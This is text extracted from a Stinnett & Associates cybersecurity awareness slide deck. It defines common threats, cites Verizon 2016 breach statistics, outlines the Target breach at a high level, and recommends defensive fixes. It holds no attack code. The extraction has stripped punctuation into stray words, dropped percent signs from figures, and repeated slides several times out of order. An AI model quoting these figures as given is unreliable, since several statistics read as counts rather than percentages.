Operational Technology (OT) ndash The Hardware and software that detects or causes a change through the direct monitoring andor control of physical devices processes and events in the enterprise OT technology and departments are usually found within manufacturing and industrial environments and include industrial control systems (ICS) such as Supervisory Control and Data Acquisition systems(SCADA) OT devices and environments are typically run separately from IT departments These are the devices that communicate with pipelines and electrical grids (and nuclear power plants)
Internet of Things ndash A computing concept that describes the idea of everyday physical devices (DVR systems thermostats refrigerators vehicles) being connected to the internet and being able to identify themselves to other devices which enable the devices to collect and exchange data
copyStinnett amp Associates LLC
CYBERSECURITY COMMON TERMS AND DEFINITIONS
19
Bot ndash A bot is a software ldquorobotrdquo that performs an extensive set of automated tasks on its own Bots can perform an extensive set of destructive tasks as well as introduce many forms of malware to your system or network They can also be used by black hats to coordinate attacks by controlling botnets
Botnet ndash A number of Internet-connected devices (eg computers DVR systems and other devices) after being infected with malware each of which is running one or more bots Botnets can be used to perform Distributed Denial Of Service Attack steal data send spam and allow the attacker access to the device and its connection Botnets can be rented out to other hackers or cyber criminals
Denial of Service(DOS) and Distributed Denial of Service ndash A type of attack on a network that is designed to bring the network to its knees by flooding it with useless traffic A Distributed DOS is the same as a DOS attack but involves multiple computers attacking the network from multiple locations Typically the computers being used are infected with Botnet
copyStinnett amp Associates LLC
CYBERSECURITY COMMON TERMS AND DEFINITIONS
20
Middleware ndash Software that facilitates exchange of data between two application programs within the same
environment or across different hardware and network environments Three basic types of middleware are (1)
communication middleware (2) database middleware and (3) system middleware
Man-in-the-Middle (MITM) Attacks ndash An attack occurrence where the attacker has been able to place
themselves in the middle of communications between two parties The Attacker is able to alter or obtain data for
themselves while unknown to the other two parties
SQL Injection and Cross-site scripting Attacks ndash An attack occurrence where the attacker injects malicious
code into a website In SQL Injection the attacker uses SQL language to obtain information back from the
website that was unintended In Cross-site scripting the attacker injects code that only impacts other users of
website
copyStinnett amp Associates LLC
CYBERSECURITY COMMON TERMS AND DEFINITIONS
21
Common Vulnerability and Exposures (CVE) ndash Catalog sponsored by Homeland Security that documents known Cyber threats Vulnerabilities are known errors in a system or software that provides an attacker with direct access Exposures are known errors that allow an attacked indirect access which may allow the attacker to gather knowledge or content Many of the malwares and cyber attacks in the news resulted from attackers utilizing a vulnerability that had been known and fixed by the vendor for several months or years but not fixed at the company level
Zero Day VulnerabilityAttack ndash An unknown or newly discovered vulnerability that has not yet been fixed by the software or system provider Zero day vulnerabilities are the most difficult to protect against and detect due to the lack of knowledge and support by vendor
Advanced Persistent Threat ndash A set of stealthy and continuous computer hacking processes often orchestrated by a person or persons targeting a specific entity
copyStinnett amp Associates LLC
CYBERSECURITY COMMON TERMS AND DEFINITIONS
22
Dark Web Darknet ndash Websites located on the internet that are not accessible by normal search engines or
means Darknet sites require special software such as TOR (The Onion Router) that helps keep users
anonymous Darknet sites are used for several illegal activities such as black market purchasing of stolen PII or
Credit card data as well as Botnet rentals Bitcoins are traded on the Dark web
Bitcoin ndash A digital currency created in 2009 There are no physical bitcoins only balances kept on a public
ledger in the cloud that ndash along with all Bitcoin transactions ndash is verified by a massive amount of computing
power Bitcoin mining is the process through which bitcoins are released to come into circulation and involves
solving a computationally difficult puzzle to discover a new block which is added to the blockchain and receiving
a reward in the form of few bitcoins As more and more bitcoins are created the difficulty of the mining process ndash
that is the amount of computing power involved ndash increases
copyStinnett amp Associates LLC
PHISHING
A form of social engineering in which a message typically an email with a malicious
attachment or link is sent to a victim with the intent of tricking the recipient to open an
attachment
23
Spear-Phishing ndash Phishing attacks directed at a specific
individual or company Sub-category of Spear Phishing includes
Cloning (using a previous legitimate email) and Whaling (attacking
a high level executive)
bull CEO Email to Treasurer
bull HR Phishing for Employee Data
bull W2 Phishing Data (IRS Sent out Warning)
The majority of Phishing cases are used as a means to install
Malware onto a host environment
copyStinnett amp Associates LLC
PHISHING
Most companies battle the increase Phishing and spear-phishing attacks by labeling each
external email with some form of the following inserts
24
copyStinnett amp Associates LLC
MALWARE
Malware is short for malicious software Malware is a broad term that encompasses computer
viruses worms Trojan horses spyware adware and now Ransomware Malware is designed
to interfere with normal computer operation usually giving hackers a chance to gain access to
your computer and collect sensitive personal information
25
bull Malware is seen as first access
point used in connection with
hacking attempts
bull Ransomware is the latest version
of Malware that has been in the
headlines and represents one of
the largest cyber threats to most
companies
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
RANSOMWARE
A type of malware that prevents or limits users from accessing their system either by locking the
systems screen or by locking the users files unless a ransom is paid Ransomware typically
encrypts certain file types on infected systems and forces users to pay the ransom through certain
online payment methods to get a decrypt key
26
bull The Use of BITCOINS is typically the
payment method
bull Ransomware attacks quadrupled to 4000
per day from 2015 to 2016
bull This yearrsquos WannaCry Ransomware attack
impacted over 200000 people across 150
countries (included a Worm)
copyStinnett amp Associates LLC
COMMON CYBER ATTACK PATTERNS
bull 78 of all breaches results from these 5
Attack Patterns
- Web App Attacks
- POS Intrusions
- Privilege Misuse
- Cyber-espionage
- Crimeware
63 of all breaches attributable to the top 2 alone
27
Common attack patterns account for a vast majority of documented breaches
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
WEB APP ATTACKS
bull Modern websites with business
functionality increase the impact of a
successful breach
bull Recycled or unchanged default
passwords can compromise an
organizationrsquos security efforts
bull Breaching a web application can
open the gates to internal
applications and code
bull Cross site scripting and SQL
injection are most common attack
attempts
28
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
POINT-OF-SALE (POS) INTRUSIONS
bull Attackers target systems capturing
customer payment information during
legitimate transactions
bull Attacks can exploit POS software or
hardware
bull Attackers commonly target POS
system vendors as a means to exploit
an organizationrsquos POS system
bull Retail and accommodation sites are
experiencing massive POS attacks
29
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
PRIVILEGE MISUSE
bull Internal Parties act (maliciously or
not) in a way to cause a breach
bull Most actors are outside Executive
Management and leadership roles
bull While financial reasons still motivate
most actors espionage has become
an increasingly common motivation
bull Most breaches take months or
longer to discover
30
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
CYBER-ESPIONAGE
bull External Parties (possibly state-
affiliated or organized crime)
infiltrating an organizationrsquos systems
bull Attacks commonly begin through
phishing andor exploiting
backdoors in software (browsers or
even websites)
bull Over 90 of breaches target trade
secrets for exfiltration
31
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
CRIMEWARE
bull Crimeware contains any malware or
other incident that focuses directly
on financial opportunity
bull Ransomware keyloggers and use
of backdoors most common
occurrence of Crimeware
bull Crimeware is typically introduced
through the following- Email Attachment
- Cross-site scripting from visited website
- Email Link
32
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
KEY CYBER ATTACKS IN THE NEWS
bull Target Data Breach ndash 70 Million PII Records of Users
and 40 Million Credit Cards Stolen
bull Sony Attack ndash Malware attack that erased over half of
the companyrsquos servers and PCrsquos and released 4
unreleased movies and over 45000 social security
numbers
bull Yahoo Data Breach (20132014) ndash August breach that
exposed PII of 1 billion users 2014 data breach of 500
million users Additional data loss in 2016
bull Prepaid CardATM Scheme (2013) ndash $45 Million Stolen
(worldwide)
bull Bank of Bangladesh (February 2016) ndash $81 Million
Stolen
33
copyStinnett amp Associates LLC
COMPLEXITY BEHIND THE TARGET ATTACK
34
bull Cyber attackers first attacked third party vender (The HVAC Vendor) through use of Malware introduced via phishing campaign
bull Used HVAC Vendor stolen credentials to gain access to third party website used for submitting electronic invoices
bull Injected code into a vulnerability of the electronic submission process to gain further access to Target internal network
bull Recon-ed the environment and obtained domain administrator access
bull Attackers then worked their way through various servers by using a scanner to detect which other servers they could gain access to from their current location Worked around firewalls and other defenses
copyStinnett amp Associates LLC
COMPLEXITY BEHIND THE TARGET ATTACK
35
bull Gained access to server than contained SQL database and were able to download 70 million PII records of customers
bull Attackers then gained access to POS environment (should have been walled off)
bull Attackers then went on the darknet and inquired to find someone with knowledge of the POS system and how to inject code into the POS application
bull Attackers were able to install malware on certain POS servers that scanned memory and saved off credit card information
bull Attackers then copied credit card files to another server that had remote FTP ability and sent files to themselves
copyStinnett amp Associates LLC
RANSOMWARE ndash ANATOMY OF AN ATTACK
36
copyStinnett amp Associates LLC
BARRIERS TO EFFECTIVE CYBERSECURITY
Many companies do not know where to start with cybersecurity how to evaluate what is
enough or how to recover when their best efforts still result in a cyber breach Main
reasons for companies struggles are
37
bull Expansion of the attack surface
bull Continued innovations in technology
bull Lack of understanding of companyrsquos information assets and the assetrsquos value
bull Failure to properly understand threats and risks
bull Failure to implement core security protocols and procedures
bull Lack of skilled resources (people and time)
bull Lack of funds
copyStinnett amp Associates LLC
CYBERSECURITY DEFENSE IN-DEPTH
38
PEOPLE
TECHNOLOGYPROCESSES
THE PEOPLE CHALLENGEHumans remain one of the weakest links in security chain Ensure you have a strong security awareness training program
THE TECHNOLOGY CHALLENGEThe increasing sophistication and rate of attacks means that constant upkeep and tracking of technology changes is essential
THE PROCESS CHALLENGEEnsure best practice processes and associated management frameworks are in place Regular audits and reviews are important
copyStinnett amp Associates LLC
IMPLEMENTING A CYBERSECURITY PROGRAM
39
bull Understand the organizational risk
and where high risk assets exist
bull Risk assessments should be
performed annually or when
significant changes to the
environment occur
bull Stinnett uses Microsoft STRIDE
Threat Modeling to semi-qualitatively
measure cybersecurity risks to
identify estimate and prioritize
information security risks
Identification of Assets
Asset Locations
Classification of Assets
Threat Modeling
Calculated Risk Results
copyStinnett amp Associates LLC
CYBERSECURITY RISK ASSESSMENT
Key to an effective cybersecurity program is to understand the Companyrsquos information
assets
40
bull What Value Do the Assets Havebull Credit Card Databull Employee or Customer Recordsbull Bank Accountsbull Intellectual Propertybull Trade Secretsbull Insider Knowledgebull Who Would Want the Databull Data Location
copyStinnett amp Associates LLC
BASELINE GAP ANALYSIS
41
bull Perform walkthroughs with information technology department to understand cybersecurity controls in place
bull Evaluate control design as it relates to commonly accepted framework(s)
bull Identify control gaps and create a baseline for cybersecurity maturity in the organization
copyStinnett amp Associates LLC
CYBERSECURITY FAILURES AND FIXES
42
Patch Management ndash A Patch Management process is a companyrsquos strategy around ensuring a companyrsquos IT devices
are properly updated (patched) to reflect the latest software update or release from the vendor Most companies fail to
implement sound patch management processes and procedures which includes
bull 99 of exploited vulnerabilities were comprised more than a year after the patch was published
bull Companies do not know all of the Information devices in their network and therefore are unable
to adequately assess their patch management process
User and Administrator level Access ndash Companies fail to adequately assess User access levels to ensure that the
principle of Least Privilege is applied as much as possible Within IT department the failure of Least Privilege can
result in multiple individuals and IDrsquos with access andor knowledge of higher level functions within the environment
User Cybersecurity Training and Awareness ndash Companies often fail to implement basic end user training around
cybersecurity Often times the uneducated or untrained end user is the Cyber attackers first entry point into the
company
copyStinnett amp Associates LLC
CYBERSECURITY FAILURES AND FIXES
43
FIXESbull Obtain at least a basic understanding of your critical information assets where they are
stored and how they are protected
bull Perform an Inventory of IT devices and assess each devices risk relating to patches
bull Focus on higher risk areas such as internet facing devices and software with known vulnerabilities (Adobe Java Browsers Operating Systems)
bull Perform an inventory of all User and Admin IDs Understand the access each ID has in your environment and why that access level is necessary Assess whether password levels and parameters are adequate (password length characters and change interval)
bull Implement a continual end user training program
bull Ensure backups and recovery plans work as intended and are properly segregated
copyStinnett amp Associates LLC
QUESTIONS
44
wwwSTINNETT-ASSOCIATEScom | 8888081795
Stinnett amp Associates8811 S Yale Ave Suite 300
Tulsa OK 74137
Main Number 9187283300
ContactUsStinnett-Associatescom
copyStinnett amp Associates LLC
FINANCIAL GAIN STILL 1 REASON
13
Financial Gain is still the 1 factor for cyber attacks and breaches at over 75 in 2015
Espionage and other factors combined still make up less than 25
bull Personally Identifiable Information
(PII) is worth more on the black
market (ldquoThe Dark Webrdquo) then Credit
Card Numbers
bull Ransomware payments estimated
over $1 billion in 2016
bull 70 of all Ransomware was paid
bull 20 paid over $20000
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
METHODS OF FINANCIAL GAIN
Cyber criminals have multiple means to achieve financial gain
14
bull Theft of funds (Bank Accounts)bull Extortion (Ransomware)bull Selling of stolen credit cardsbull Selling of PII databull Insider trading informationbull Using compromised environment for other
attacks or for rent
copyStinnett amp Associates LLC
THE TYPES OF CYBER ATTACKS AND EXPLOITS ARE CHANGING
15
bull Server Attacks once at 50 are
trending down
bull User Device and Person attacks are
both trending upward at nearly same
pace due to Malware Ransomware
and Phishing attacks
The types of exploits used are changing
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
CYBERSECURITY DEFINED
The body of technologies processes and practices
designed to protect networks computers programs and
data from attack damage or unauthorized access
Cybersecurity is usually considered a sub-set of
Information Security but can require the consideration of
bull Application Security
bull Operating System and Network security
bull Usage of Specific Intrusion Detection and Prevention
Software and tools
bull User Training and Education
bull Disaster Recovery and Business Continuity Considerations
bull Really Anything to help prevent detect or recover from a
Cyberattack
16
copyStinnett amp Associates LLC
CYBER ATTACK DEFINED
The deliberate exploitation of computer systems technology-dependent enterprises and
networks Cyber attacks can use malicious code weak passwords or other cyber exploits to gain
unlawful access to systems and data often resulting in disruptive consequences that can
compromise data and lead to cybercrimes such as information and identity theft
Cyber attacks often include the followingbull Identity theft fraud extortionbull Malware pharming phishing spamming spoofing spyware Trojans
and virusesbull Stolen hardware such as laptops or mobile devicesbull Denial-of-service and distributed denial-of-service attacksbull Breach of accessbull Password sniffingbull System infiltrationbull Website defacementbull Private and public Web browser exploitsbull Instant messaging abusebull Intellectual property (IP) theft or unauthorized access
17
copyStinnett amp Associates LLC
CYBERSECURITY COMMON TERMS AND DEFINITIONS
18
Information Technology (IT) ndash The typically corporate department that handles the corporate software and hardware that runs the normal functions of a typical business or enterprise The department within a company that is charged with establishing monitoring and maintaining information technology systems and services
Operational Technology (OT) ndash The Hardware and software that detects or causes a change through the direct monitoring andor control of physical devices processes and events in the enterprise OT technology and departments are usually found within manufacturing and industrial environments and include industrial control systems (ICS) such as Supervisory Control and Data Acquisition systems(SCADA) OT devices and environments are typically run separately from IT departments These are the devices that communicate with pipelines and electrical grids (and nuclear power plants)
Internet of Things ndash A computing concept that describes the idea of everyday physical devices (DVR systems thermostats refrigerators vehicles) being connected to the internet and being able to identify themselves to other devices which enable the devices to collect and exchange data
copyStinnett amp Associates LLC
CYBERSECURITY COMMON TERMS AND DEFINITIONS
19
Bot ndash A bot is a software ldquorobotrdquo that performs an extensive set of automated tasks on its own Bots can perform an extensive set of destructive tasks as well as introduce many forms of malware to your system or network They can also be used by black hats to coordinate attacks by controlling botnets
Botnet ndash A number of Internet-connected devices (eg computers DVR systems and other devices) after being infected with malware each of which is running one or more bots Botnets can be used to perform Distributed Denial Of Service Attack steal data send spam and allow the attacker access to the device and its connection Botnets can be rented out to other hackers or cyber criminals
Denial of Service(DOS) and Distributed Denial of Service ndash A type of attack on a network that is designed to bring the network to its knees by flooding it with useless traffic A Distributed DOS is the same as a DOS attack but involves multiple computers attacking the network from multiple locations Typically the computers being used are infected with Botnet
copyStinnett amp Associates LLC
CYBERSECURITY COMMON TERMS AND DEFINITIONS
20
Middleware ndash Software that facilitates exchange of data between two application programs within the same
environment or across different hardware and network environments Three basic types of middleware are (1)
communication middleware (2) database middleware and (3) system middleware
Man-in-the-Middle (MITM) Attacks ndash An attack occurrence where the attacker has been able to place
themselves in the middle of communications between two parties The Attacker is able to alter or obtain data for
themselves while unknown to the other two parties
SQL Injection and Cross-site scripting Attacks ndash An attack occurrence where the attacker injects malicious
code into a website In SQL Injection the attacker uses SQL language to obtain information back from the
website that was unintended In Cross-site scripting the attacker injects code that only impacts other users of
website
copyStinnett amp Associates LLC
CYBERSECURITY COMMON TERMS AND DEFINITIONS
21
Common Vulnerability and Exposures (CVE) ndash Catalog sponsored by Homeland Security that documents known Cyber threats Vulnerabilities are known errors in a system or software that provides an attacker with direct access Exposures are known errors that allow an attacked indirect access which may allow the attacker to gather knowledge or content Many of the malwares and cyber attacks in the news resulted from attackers utilizing a vulnerability that had been known and fixed by the vendor for several months or years but not fixed at the company level
Zero Day VulnerabilityAttack ndash An unknown or newly discovered vulnerability that has not yet been fixed by the software or system provider Zero day vulnerabilities are the most difficult to protect against and detect due to the lack of knowledge and support by vendor
Advanced Persistent Threat ndash A set of stealthy and continuous computer hacking processes often orchestrated by a person or persons targeting a specific entity
copyStinnett amp Associates LLC
CYBERSECURITY COMMON TERMS AND DEFINITIONS
22
Dark Web Darknet ndash Websites located on the internet that are not accessible by normal search engines or
means Darknet sites require special software such as TOR (The Onion Router) that helps keep users
anonymous Darknet sites are used for several illegal activities such as black market purchasing of stolen PII or
Credit card data as well as Botnet rentals Bitcoins are traded on the Dark web
Bitcoin ndash A digital currency created in 2009 There are no physical bitcoins only balances kept on a public
ledger in the cloud that ndash along with all Bitcoin transactions ndash is verified by a massive amount of computing
power Bitcoin mining is the process through which bitcoins are released to come into circulation and involves
solving a computationally difficult puzzle to discover a new block which is added to the blockchain and receiving
a reward in the form of few bitcoins As more and more bitcoins are created the difficulty of the mining process ndash
that is the amount of computing power involved ndash increases
copyStinnett amp Associates LLC
PHISHING
A form of social engineering in which a message typically an email with a malicious
attachment or link is sent to a victim with the intent of tricking the recipient to open an
attachment
23
Spear-Phishing ndash Phishing attacks directed at a specific
individual or company Sub-category of Spear Phishing includes
Cloning (using a previous legitimate email) and Whaling (attacking
a high level executive)
bull CEO Email to Treasurer
bull HR Phishing for Employee Data
bull W2 Phishing Data (IRS Sent out Warning)
The majority of Phishing cases are used as a means to install
Malware onto a host environment
copyStinnett amp Associates LLC
PHISHING
Most companies battle the increase Phishing and spear-phishing attacks by labeling each
external email with some form of the following inserts
24
copyStinnett amp Associates LLC
MALWARE
Malware is short for malicious software Malware is a broad term that encompasses computer
viruses worms Trojan horses spyware adware and now Ransomware Malware is designed
to interfere with normal computer operation usually giving hackers a chance to gain access to
your computer and collect sensitive personal information
25
bull Malware is seen as first access
point used in connection with
hacking attempts
bull Ransomware is the latest version
of Malware that has been in the
headlines and represents one of
the largest cyber threats to most
companies
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
RANSOMWARE
A type of malware that prevents or limits users from accessing their system either by locking the
systems screen or by locking the users files unless a ransom is paid Ransomware typically
encrypts certain file types on infected systems and forces users to pay the ransom through certain
online payment methods to get a decrypt key
26
bull The Use of BITCOINS is typically the
payment method
bull Ransomware attacks quadrupled to 4000
per day from 2015 to 2016
bull This yearrsquos WannaCry Ransomware attack
impacted over 200000 people across 150
countries (included a Worm)
copyStinnett amp Associates LLC
COMMON CYBER ATTACK PATTERNS
bull 78 of all breaches results from these 5
Attack Patterns
- Web App Attacks
- POS Intrusions
- Privilege Misuse
- Cyber-espionage
- Crimeware
63 of all breaches attributable to the top 2 alone
27
Common attack patterns account for a vast majority of documented breaches
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
WEB APP ATTACKS
bull Modern websites with business
functionality increase the impact of a
successful breach
bull Recycled or unchanged default
passwords can compromise an
organizationrsquos security efforts
bull Breaching a web application can
open the gates to internal
applications and code
bull Cross site scripting and SQL
injection are most common attack
attempts
28
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
POINT-OF-SALE (POS) INTRUSIONS
bull Attackers target systems capturing
customer payment information during
legitimate transactions
bull Attacks can exploit POS software or
hardware
bull Attackers commonly target POS
system vendors as a means to exploit
an organizationrsquos POS system
bull Retail and accommodation sites are
experiencing massive POS attacks
29
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
PRIVILEGE MISUSE
bull Internal Parties act (maliciously or
not) in a way to cause a breach
bull Most actors are outside Executive
Management and leadership roles
bull While financial reasons still motivate
most actors espionage has become
an increasingly common motivation
bull Most breaches take months or
longer to discover
30
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
CYBER-ESPIONAGE
bull External Parties (possibly state-
affiliated or organized crime)
infiltrating an organizationrsquos systems
bull Attacks commonly begin through
phishing andor exploiting
backdoors in software (browsers or
even websites)
bull Over 90 of breaches target trade
secrets for exfiltration
31
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
CRIMEWARE
bull Crimeware contains any malware or
other incident that focuses directly
on financial opportunity
bull Ransomware keyloggers and use
of backdoors most common
occurrence of Crimeware
bull Crimeware is typically introduced
through the following- Email Attachment
- Cross-site scripting from visited website
- Email Link
32
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
KEY CYBER ATTACKS IN THE NEWS
bull Target Data Breach ndash 70 Million PII Records of Users
and 40 Million Credit Cards Stolen
bull Sony Attack ndash Malware attack that erased over half of
the companyrsquos servers and PCrsquos and released 4
unreleased movies and over 45000 social security
numbers
bull Yahoo Data Breach (20132014) ndash August breach that
exposed PII of 1 billion users 2014 data breach of 500
million users Additional data loss in 2016
bull Prepaid CardATM Scheme (2013) ndash $45 Million Stolen
(worldwide)
bull Bank of Bangladesh (February 2016) ndash $81 Million
Stolen
33
copyStinnett amp Associates LLC
COMPLEXITY BEHIND THE TARGET ATTACK
34
bull Cyber attackers first attacked third party vender (The HVAC Vendor) through use of Malware introduced via phishing campaign
bull Used HVAC Vendor stolen credentials to gain access to third party website used for submitting electronic invoices
bull Injected code into a vulnerability of the electronic submission process to gain further access to Target internal network
bull Recon-ed the environment and obtained domain administrator access
bull Attackers then worked their way through various servers by using a scanner to detect which other servers they could gain access to from their current location Worked around firewalls and other defenses
copyStinnett amp Associates LLC
COMPLEXITY BEHIND THE TARGET ATTACK
35
bull Gained access to server than contained SQL database and were able to download 70 million PII records of customers
bull Attackers then gained access to POS environment (should have been walled off)
bull Attackers then went on the darknet and inquired to find someone with knowledge of the POS system and how to inject code into the POS application
bull Attackers were able to install malware on certain POS servers that scanned memory and saved off credit card information
bull Attackers then copied credit card files to another server that had remote FTP ability and sent files to themselves
copyStinnett amp Associates LLC
RANSOMWARE ndash ANATOMY OF AN ATTACK
36
copyStinnett amp Associates LLC
BARRIERS TO EFFECTIVE CYBERSECURITY
Many companies do not know where to start with cybersecurity how to evaluate what is
enough or how to recover when their best efforts still result in a cyber breach Main
reasons for companies struggles are
37
bull Expansion of the attack surface
bull Continued innovations in technology
bull Lack of understanding of companyrsquos information assets and the assetrsquos value
bull Failure to properly understand threats and risks
bull Failure to implement core security protocols and procedures
bull Lack of skilled resources (people and time)
bull Lack of funds
copyStinnett amp Associates LLC
CYBERSECURITY DEFENSE IN-DEPTH
38
PEOPLE
TECHNOLOGYPROCESSES
THE PEOPLE CHALLENGEHumans remain one of the weakest links in security chain Ensure you have a strong security awareness training program
THE TECHNOLOGY CHALLENGEThe increasing sophistication and rate of attacks means that constant upkeep and tracking of technology changes is essential
THE PROCESS CHALLENGEEnsure best practice processes and associated management frameworks are in place Regular audits and reviews are important
copyStinnett amp Associates LLC
IMPLEMENTING A CYBERSECURITY PROGRAM
39
bull Understand the organizational risk
and where high risk assets exist
bull Risk assessments should be
performed annually or when
significant changes to the
environment occur
bull Stinnett uses Microsoft STRIDE
Threat Modeling to semi-qualitatively
measure cybersecurity risks to
identify estimate and prioritize
information security risks
Identification of Assets
Asset Locations
Classification of Assets
Threat Modeling
Calculated Risk Results
copyStinnett amp Associates LLC
CYBERSECURITY RISK ASSESSMENT
Key to an effective cybersecurity program is to understand the Companyrsquos information
assets
40
bull What Value Do the Assets Havebull Credit Card Databull Employee or Customer Recordsbull Bank Accountsbull Intellectual Propertybull Trade Secretsbull Insider Knowledgebull Who Would Want the Databull Data Location
copyStinnett amp Associates LLC
BASELINE GAP ANALYSIS
41
bull Perform walkthroughs with information technology department to understand cybersecurity controls in place
bull Evaluate control design as it relates to commonly accepted framework(s)
bull Identify control gaps and create a baseline for cybersecurity maturity in the organization
copyStinnett amp Associates LLC
CYBERSECURITY FAILURES AND FIXES
42
Patch Management ndash A Patch Management process is a companyrsquos strategy around ensuring a companyrsquos IT devices
are properly updated (patched) to reflect the latest software update or release from the vendor Most companies fail to
implement sound patch management processes and procedures which includes
bull 99 of exploited vulnerabilities were comprised more than a year after the patch was published
bull Companies do not know all of the Information devices in their network and therefore are unable
to adequately assess their patch management process
User and Administrator level Access ndash Companies fail to adequately assess User access levels to ensure that the
principle of Least Privilege is applied as much as possible Within IT department the failure of Least Privilege can
result in multiple individuals and IDrsquos with access andor knowledge of higher level functions within the environment
User Cybersecurity Training and Awareness ndash Companies often fail to implement basic end user training around
cybersecurity Often times the uneducated or untrained end user is the Cyber attackers first entry point into the
company
copyStinnett amp Associates LLC
CYBERSECURITY FAILURES AND FIXES
43
FIXESbull Obtain at least a basic understanding of your critical information assets where they are
stored and how they are protected
bull Perform an Inventory of IT devices and assess each devices risk relating to patches
bull Focus on higher risk areas such as internet facing devices and software with known vulnerabilities (Adobe Java Browsers Operating Systems)
bull Perform an inventory of all User and Admin IDs Understand the access each ID has in your environment and why that access level is necessary Assess whether password levels and parameters are adequate (password length characters and change interval)
bull Implement a continual end user training program
bull Ensure backups and recovery plans work as intended and are properly segregated
copyStinnett amp Associates LLC
QUESTIONS
44
wwwSTINNETT-ASSOCIATEScom | 8888081795
Stinnett amp Associates8811 S Yale Ave Suite 300
Tulsa OK 74137
Main Number 9187283300
ContactUsStinnett-Associatescom
copyStinnett amp Associates LLC
METHODS OF FINANCIAL GAIN
Cyber criminals have multiple means to achieve financial gain
14
bull Theft of funds (Bank Accounts)bull Extortion (Ransomware)bull Selling of stolen credit cardsbull Selling of PII databull Insider trading informationbull Using compromised environment for other
attacks or for rent
copyStinnett amp Associates LLC
THE TYPES OF CYBER ATTACKS AND EXPLOITS ARE CHANGING
15
bull Server Attacks once at 50 are
trending down
bull User Device and Person attacks are
both trending upward at nearly same
pace due to Malware Ransomware
and Phishing attacks
The types of exploits used are changing
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
CYBERSECURITY DEFINED
The body of technologies processes and practices
designed to protect networks computers programs and
data from attack damage or unauthorized access
Cybersecurity is usually considered a sub-set of
Information Security but can require the consideration of
bull Application Security
bull Operating System and Network security
bull Usage of Specific Intrusion Detection and Prevention
Software and tools
bull User Training and Education
bull Disaster Recovery and Business Continuity Considerations
bull Really Anything to help prevent detect or recover from a
Cyberattack
16
copyStinnett amp Associates LLC
CYBER ATTACK DEFINED
The deliberate exploitation of computer systems technology-dependent enterprises and
networks Cyber attacks can use malicious code weak passwords or other cyber exploits to gain
unlawful access to systems and data often resulting in disruptive consequences that can
compromise data and lead to cybercrimes such as information and identity theft
Cyber attacks often include the followingbull Identity theft fraud extortionbull Malware pharming phishing spamming spoofing spyware Trojans
and virusesbull Stolen hardware such as laptops or mobile devicesbull Denial-of-service and distributed denial-of-service attacksbull Breach of accessbull Password sniffingbull System infiltrationbull Website defacementbull Private and public Web browser exploitsbull Instant messaging abusebull Intellectual property (IP) theft or unauthorized access
17
copyStinnett amp Associates LLC
CYBERSECURITY COMMON TERMS AND DEFINITIONS
18
Information Technology (IT) ndash The typically corporate department that handles the corporate software and hardware that runs the normal functions of a typical business or enterprise The department within a company that is charged with establishing monitoring and maintaining information technology systems and services
Operational Technology (OT) ndash The Hardware and software that detects or causes a change through the direct monitoring andor control of physical devices processes and events in the enterprise OT technology and departments are usually found within manufacturing and industrial environments and include industrial control systems (ICS) such as Supervisory Control and Data Acquisition systems(SCADA) OT devices and environments are typically run separately from IT departments These are the devices that communicate with pipelines and electrical grids (and nuclear power plants)
Internet of Things ndash A computing concept that describes the idea of everyday physical devices (DVR systems thermostats refrigerators vehicles) being connected to the internet and being able to identify themselves to other devices which enable the devices to collect and exchange data
copyStinnett amp Associates LLC
CYBERSECURITY COMMON TERMS AND DEFINITIONS
19
Bot ndash A bot is a software ldquorobotrdquo that performs an extensive set of automated tasks on its own Bots can perform an extensive set of destructive tasks as well as introduce many forms of malware to your system or network They can also be used by black hats to coordinate attacks by controlling botnets
Botnet ndash A number of Internet-connected devices (eg computers DVR systems and other devices) after being infected with malware each of which is running one or more bots Botnets can be used to perform Distributed Denial Of Service Attack steal data send spam and allow the attacker access to the device and its connection Botnets can be rented out to other hackers or cyber criminals
Denial of Service(DOS) and Distributed Denial of Service ndash A type of attack on a network that is designed to bring the network to its knees by flooding it with useless traffic A Distributed DOS is the same as a DOS attack but involves multiple computers attacking the network from multiple locations Typically the computers being used are infected with Botnet
copyStinnett amp Associates LLC
CYBERSECURITY COMMON TERMS AND DEFINITIONS
20
Middleware ndash Software that facilitates exchange of data between two application programs within the same
environment or across different hardware and network environments Three basic types of middleware are (1)
communication middleware (2) database middleware and (3) system middleware
Man-in-the-Middle (MITM) Attacks ndash An attack occurrence where the attacker has been able to place
themselves in the middle of communications between two parties The Attacker is able to alter or obtain data for
themselves while unknown to the other two parties
SQL Injection and Cross-site scripting Attacks ndash An attack occurrence where the attacker injects malicious
code into a website In SQL Injection the attacker uses SQL language to obtain information back from the
website that was unintended In Cross-site scripting the attacker injects code that only impacts other users of
website
copyStinnett amp Associates LLC
CYBERSECURITY COMMON TERMS AND DEFINITIONS
21
Common Vulnerability and Exposures (CVE) ndash Catalog sponsored by Homeland Security that documents known Cyber threats Vulnerabilities are known errors in a system or software that provides an attacker with direct access Exposures are known errors that allow an attacked indirect access which may allow the attacker to gather knowledge or content Many of the malwares and cyber attacks in the news resulted from attackers utilizing a vulnerability that had been known and fixed by the vendor for several months or years but not fixed at the company level
Zero Day VulnerabilityAttack ndash An unknown or newly discovered vulnerability that has not yet been fixed by the software or system provider Zero day vulnerabilities are the most difficult to protect against and detect due to the lack of knowledge and support by vendor
Advanced Persistent Threat ndash A set of stealthy and continuous computer hacking processes often orchestrated by a person or persons targeting a specific entity
copyStinnett amp Associates LLC
CYBERSECURITY COMMON TERMS AND DEFINITIONS
22
Dark Web Darknet ndash Websites located on the internet that are not accessible by normal search engines or
